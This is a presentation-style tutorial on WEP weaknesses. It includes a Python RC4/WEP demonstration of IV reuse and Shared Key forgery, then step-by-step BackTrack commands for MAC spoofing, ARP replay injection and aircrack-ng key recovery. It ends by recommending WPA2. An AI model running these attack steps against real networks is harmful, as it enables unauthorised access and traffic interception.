Cracking WEP Secured Wireless Networks

Hammam Samara
What is WEP

 Stands for Wired Equivalent Privacy.
 A 13-year-old protocol (even older than Google!).
 Several serious weaknesses in the protocol have been
 identified since its early days.
     It can be cracked with readily available software within
     minutes!
     I never believed it until I tried it myself, hence this session.

 Despite that, WEP is still widely in use, and it is often the first
 security choice presented to the user by router configuration tools.
WEP Authentication

 Two methods of authentication can be used with WEP:
   Open System authentication
      No credentials are exchanged. After authentication and
      association, the client simply needs the right key to
      send and receive traffic.
   Shared Key authentication
      A four-way challenge-response handshake is used: the AP
      sends a challenge and the client returns it WEP-encrypted.
 Which way is stronger?
      Counter-intuitively, Open System. In Shared Key the challenge
      goes out in the clear and comes back encrypted, so anyone
      listening obtains an IV and a keystream sample, which is
      enough to pass the handshake later without knowing the key.
How it works

Basic WEP encryption: the sender picks a 24-bit IV, seeds RC4 with
IV || key, and XORs the resulting keystream with the plaintext (the
payload plus a CRC-32 integrity check value). The IV is sent in the
clear in front of the ciphertext.
So, where is the weakness?

In the IVs themselves!
    A 24-bit IV is not long enough to keep IVs from repeating on a
    busy network.
        There is a 50% probability that some IV will repeat after
        about 5,000 packets (the birthday bound on 2^24 values).
        Two frames under the same IV share a keystream, so their
        XOR is the XOR of the plaintexts, and the key never enters.
    Network not busy?
       We could make it so! ;-)
       An attacker can inject packets into the network (replayed
       ARP requests, for example) and thereby stimulate reply
       packets, each with a fresh IV, which can then be inspected
       to find the key.
    Freely available software such as aircrack-ng can now
    crack any WEP key in minutes.
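The encryption, the IV weakness and the Shared Key handshake from the slides above, as an added example that is not part of the original deck: a from-scratch RC4/WEP implementation in Python. It shows that two frames under the same IV leak the XOR of their plaintexts with no key involved, computes the birthday bound behind the "50% after 5,000 packets" figure, and recovers a keystream from a sniffed Shared Key challenge/response to answer a later challenge without the key. The key, IV and messages are constructed for the example; the birthday bound assumes IVs are chosen uniformly at random (drivers that use a counter restart at zero after a reset, so repeats can come even sooner).

```python
import math
import zlib


def rc4_keystream(seed: bytes, length: int) -> bytes:
    """RC4 key scheduling (KSA) followed by `length` bytes of output (PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + seed[i % len(seed)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _icv(payload: bytes) -> bytes:
    """WEP integrity check value: a plain CRC-32 of the payload, little-endian."""
    return zlib.crc32(payload).to_bytes(4, "little")


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body as WEP sends it: 3-byte IV in the clear, then RC4(IV||key) XOR (payload||ICV).
    key is 5 bytes (40-bit, "64-bit WEP") or 13 bytes (104-bit, "128-bit WEP")."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("IV must be 3 bytes and key 5 or 13 bytes")
    plaintext = payload + _icv(payload)
    ks = rc4_keystream(iv + key, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def wep_decrypt(key: bytes, frame: bytes) -> bytes:
    """Inverse of wep_encrypt; raises if the ICV does not match (wrong key or damaged frame)."""
    iv, body = frame[:3], frame[3:]
    ks = rc4_keystream(iv + key, len(body))
    plaintext = bytes(c ^ k for c, k in zip(body, ks))
    payload, icv = plaintext[:-4], plaintext[-4:]
    if _icv(payload) != icv:
        raise ValueError("ICV mismatch")
    return payload


def xor_of_plaintexts(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV use the same keystream, so C_a XOR C_b == P_a XOR P_b.
    The key is never needed: this is what IV reuse hands an eavesdropper."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("frames use different IVs")
    return bytes(a ^ b for a, b in zip(frame_a[3:], frame_b[3:]))


def iv_collision_probability(packets: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least one IV repeats among `packets` random IVs."""
    space = 2 ** iv_bits
    return 1.0 - math.exp(-packets * (packets - 1) / (2.0 * space))


def packets_for_collision(probability: float, iv_bits: int = 24) -> int:
    """Smallest packet count at which an IV repeat reaches the given probability."""
    space = 2 ** iv_bits
    return math.ceil(math.sqrt(-2.0 * space * math.log(1.0 - probability)))


def keystream_from_shared_key_auth(challenge: bytes, response_frame: bytes):
    """Shared Key auth: the AP's 128-byte challenge is sent in the clear and the station returns
    it WEP-encrypted, so a sniffer gets the IV and 132 bytes of keystream for that IV for free."""
    iv, body = response_frame[:3], response_frame[3:]
    plaintext = challenge + _icv(challenge)
    return iv, bytes(c ^ p for c, p in zip(body, plaintext))


def forge_shared_key_response(iv: bytes, keystream: bytes, challenge: bytes) -> bytes:
    """Answer a fresh challenge by reusing the recovered IV/keystream pair; no key knowledge needed."""
    plaintext = challenge + _icv(challenge)
    if len(keystream) < len(plaintext):
        raise ValueError("recovered keystream too short for this challenge")
    return iv + bytes(p ^ k for p, k in zip(plaintext, keystream))


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")   # constructed 40-bit key
    iv = bytes.fromhex("000001")        # constructed IV, reused on purpose
    a = wep_encrypt(key, iv, b"attack at dawn!")
    b = wep_encrypt(key, iv, b"retreat at noon")
    print("IV reuse leaks P_a ^ P_b:", xor_of_plaintexts(a, b)[:15].hex())
    print("P(repeat after 5000 pkts) =", round(iv_collision_probability(5000), 3),
          "; 50% reached at", packets_for_collision(0.5), "packets")
```

The function names and the birthday-bound helpers are this example's own; WEP itself defines only the IV || key seeding, RC4 and the CRC-32 ICV. Note that the leaked XOR of plaintexts is already enough to recover both messages when one of them is guessable (ARP requests and DHCP traffic are largely constant), which is why the injection step later in the deck targets ARP.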
Still don't believe it?

      Neither did I.
Let's try it

Requirements:
  BackTrack 3 on CD or USB.
  A computer with a compatible 802.11 wireless card (one whose
  driver supports monitor mode and packet injection).
  A wireless access point or Wi-Fi router using WEP encryption
  (your own, for this exercise).
Enabling Monitor Mode

Procedure:

  Boot from the BackTrack 3 live CD and open a terminal window.
  First, enable "monitor mode" for your Wi-Fi card.
     For the Intel PRO/Wireless 3945ABG, swap the stock driver
     for the ipwraw one, which supports injection:
          modprobe -r iwl3945
          modprobe ipwraw
     Now find the interface name and stop the card:
          iwconfig
          airmon-ng stop [device]
          ifconfig [device] down
     Change the MAC address to a fake one (the same address is
     used in every aireplay-ng command below):
          macchanger --mac 00:11:22:33:44:55 [device]
          airmon-ng start [device]
Attacking the target

Procedure:
  Discover all wireless networks in range.
     We will use airodump-ng for this purpose:
        airodump-ng [device]
     Now choose a target and lock the capture onto its channel and
     BSSID, writing the frames to [filename]-01.cap:
        airodump-ng -c [channel] -w [filename] --bssid [bssid] [device]
     Now, to speed up the data output, open another console,
     fake-authenticate with the AP, then replay its ARP requests:
        aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55 -e [essid] [device]
        aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:55 [device]
Attacking the target (continued)

Procedure:
  Once you have enough packets, you can begin the crack.
     If not, use the following command:
        aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:55 [device]
        This replays captured frames to the broadcast address and
        forces the AP to generate more and more packets.
     Wait until the #Data column in airodump-ng shows more than
     20,000 packets (unique IVs), then open a new console window:
        aircrack-ng -n 128 -b [bssid] [filename]-01.cap
        -n is the key length in bits; try -n 64 if cracking fails.
        Leave the capture running: simply re-run aircrack-ng as
        more IVs arrive.
     Once aircrack-ng is done, you will be left with the key!
Now what can you do about it?

 Nothing!
 Just move to WPA (Wi-Fi Protected Access) wireless security.
    But while you are there switching security protocols,
    why not choose WPA2 (with a strong passphrase)?
    For you it is just one more option in the menu, but for
    whoever is trying to crack your network it makes a big
    difference.
Thank you for listening.

 And do not forget to secure your wireless.
Materials

 BackTrack 3 ISO file:
     FTP: http://www.filewatcher.com/m/bt3-final.iso.728705024.0.0.html
     Torrent: http://thepiratebay.org/torrent/4250350/Backtrack_3_Final_-_ISO
 Step-by-step tutorial: http://goo.gl/1Yq2
 Video tutorial: http://www.youtube.com/watch?v=kDD9PjiQ2_U
 Cracking WEP on Windows: http://tazforum.thetazzone.com/viewtopic.php?t=2069
